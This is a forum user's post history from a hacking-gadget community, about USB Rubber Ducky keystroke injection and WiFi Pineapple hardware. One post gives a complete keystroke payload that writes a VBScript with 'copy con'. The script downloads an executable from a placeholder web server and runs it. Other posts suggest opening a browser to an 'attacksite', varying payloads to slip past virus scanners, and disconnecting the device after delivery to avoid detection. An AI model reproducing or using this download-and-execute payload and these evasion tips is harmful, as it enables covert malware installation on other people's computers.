AndrewFaulds
Active Members-
Posts
22 -
Joined
-
Last visited
Everything posted by AndrewFaulds
-
[Version 1] Uploading Executables?
AndrewFaulds replied to AndrewFaulds's topic in Classic USB Rubber Ducky
Then you're a script-kiddie and not a hacker?! -
[Version 1] Uploading Executables?
AndrewFaulds replied to AndrewFaulds's topic in Classic USB Rubber Ducky
You need something like "Beginner's guide to embedded electronics"... -
[Version 1] Uploading Executables?
AndrewFaulds replied to AndrewFaulds's topic in Classic USB Rubber Ducky
Well, you get a proto board, solder it in, attach wires, connect them to teensy and program it to use it. -
And, disguised as a ducky, with a speaker soldered on, can play the rubber ducky song!
-
[Version 1] Ducky And Sensing Key Strokes
AndrewFaulds replied to Pinni3's topic in Classic USB Rubber Ducky
I know, I was joking. Well, you can always use keyboard shortcuts. Although I doubt Mac OS X is very keyboard friendly. -
[Version 1] Downloading File With Ducky
AndrewFaulds replied to nox404's topic in Classic USB Rubber Ducky
Or, even better: Open the run box, type iexplore http://attacksite.com -
[Version 1] Downloading File With Ducky
AndrewFaulds replied to nox404's topic in Classic USB Rubber Ducky
Still, copy con is more efficient. -
It makes it entirely useless. That's how it "would effect the use of it as development". As the serial converter chip, well, it appears as a serial COM port, and you need custom drivers for it. If this was a MIDI Ducky, it'd be handy. But not for anything we want. Perhaps the Arduino could do USB, with a custom USB port hooked up to the pins, but I somehow doubt if the Arduino's Serial IO mode is fast enough.
-
Removed, noob question already answered: http://www.hak5.org/forums/index.php?showtopic=16236
-
[Version 1] Downloading File With Ducky
AndrewFaulds replied to nox404's topic in Classic USB Rubber Ducky
Uh.... You can't have multiple echo commands in a line. And as I stated earlier, "echo something >dl.vbs" is less efficient than just copy con. -
[Version 1] Ducky And Sensing Key Strokes
AndrewFaulds replied to Pinni3's topic in Classic USB Rubber Ducky
So, Apple products don't get viruses? It seems they get duckies. -
[Version 1] Duckhunt Usb Attack Prevention Tool
AndrewFaulds replied to moonlit's topic in Classic USB Rubber Ducky
Oh those weird random-letter-no-longer-works bugs... I HATE THEM -
It would be more efficient to do this using keyboard presses, as you can't guarantee window position. Windows applications are HIGHLY keyboard accessible. Even the blind can brows animatedgifs.com!
-
[Version 1] Downloading File With Ducky
AndrewFaulds replied to nox404's topic in Classic USB Rubber Ducky
Why the echo commands? copy con is more efficient ;) Just do: copy con dl.vbs[RETURN] Dim HTTPGET[RETURN] Set HTTPGET = CreateObject("Microsoft.XMLHTTP")[RETURN] HTTPGET.Open "GET", "http://YOURWEBSErVER/test.exe", False[RETURN] HTTPGET.Send[RETURN] DataBin = HTTPGET.ResponseBody[RETURN] Const adTypeBinary=1[RETURN] Const adSaveCreateOverWrite=2[RETURN] Dim test1[RETURN] Set test1 = CreateObject("ADODB.Stream")[RETURN] test1.Type = adTypeBinary[RETURN] test1.Open[RETURN] test1.Write DataBin[RETURN] test1.SaveToFile "file.exe", adSaveCreateOverWrite[CTRL+Z] file.exe[RETURN] exit[RETURN] -
[Version 1] Uploading Executables?
AndrewFaulds replied to AndrewFaulds's topic in Classic USB Rubber Ducky
Well, yes, but bear in mind most virus scanners won't know the exploit (assuming a new one), plus Ducky can create a different version every time with some crafty code. -
[Version 1] Uploading Executables?
AndrewFaulds replied to AndrewFaulds's topic in Classic USB Rubber Ducky
I'm looking for more 'creative' solutions, basically I'd like everything done as Keyboard input (if I have a choice :) What I've just thought of would be using "copy con" to construct a script, e.g. [WinKey+R] cmd [Enter] copy con quack.vbs[Enter] object = someobject[Enter] object.dosomething[Enter] end[CTRL+Z] quack.vbs[Enter] Also one more idea: Make the ducky disconnect after delivering a payload, making it harder to detect. -
In the USB Rubber Ducky Part 1 video, Darren says that you could potentially upload an executable payload from the HID. How would you do this? As even the smallest 10KB payload would take a long time to "type" into the PC, even automatically. As mentioned elsewhere in this forum, with no delay, max speed would be around 500 chr/s. Now, uploading a binary via keystrokes would be slow, as binaries would have to be simulated as Alt+XXX key combinations to make it possible to enter the full range of 8-bit values. As a result, this 500 chr/s would become around 150 chr/s with no delay. At a rate of 150 bps, a 10KB (10240B) payload would take around 70 seconds to upload. That's way over a minute, and very inefficient. Emulating a USB Flash Drive might work, but then the exploit could be blocked just as easily as the USB Switchblade. Oh and Darren, if you're reading this: 1,1 is 1 pixel away from the very top-left corner of the screen. 0,0 would be correct.
-
Jasager on the Fonera 2.0 and Fonera+
AndrewFaulds replied to AndrewFaulds's topic in WiFi Pineapples Mark I, II, III
Thanks! So the Fonera+ IS in the Monkey Interceptor. -
Jasager on the Fonera 2.0 and Fonera+
AndrewFaulds posted a topic in WiFi Pineapples Mark I, II, III
When will this happen? I think the Fonera+ is much better than Fonera 2.0 for this, as it's far more portable. Also, the la Fonera+ has 2 ethernet ports, which could be very useful... Or is the la Fonera+ inside the yellow monkey thing? As it has wifi and two ethernets... hmm....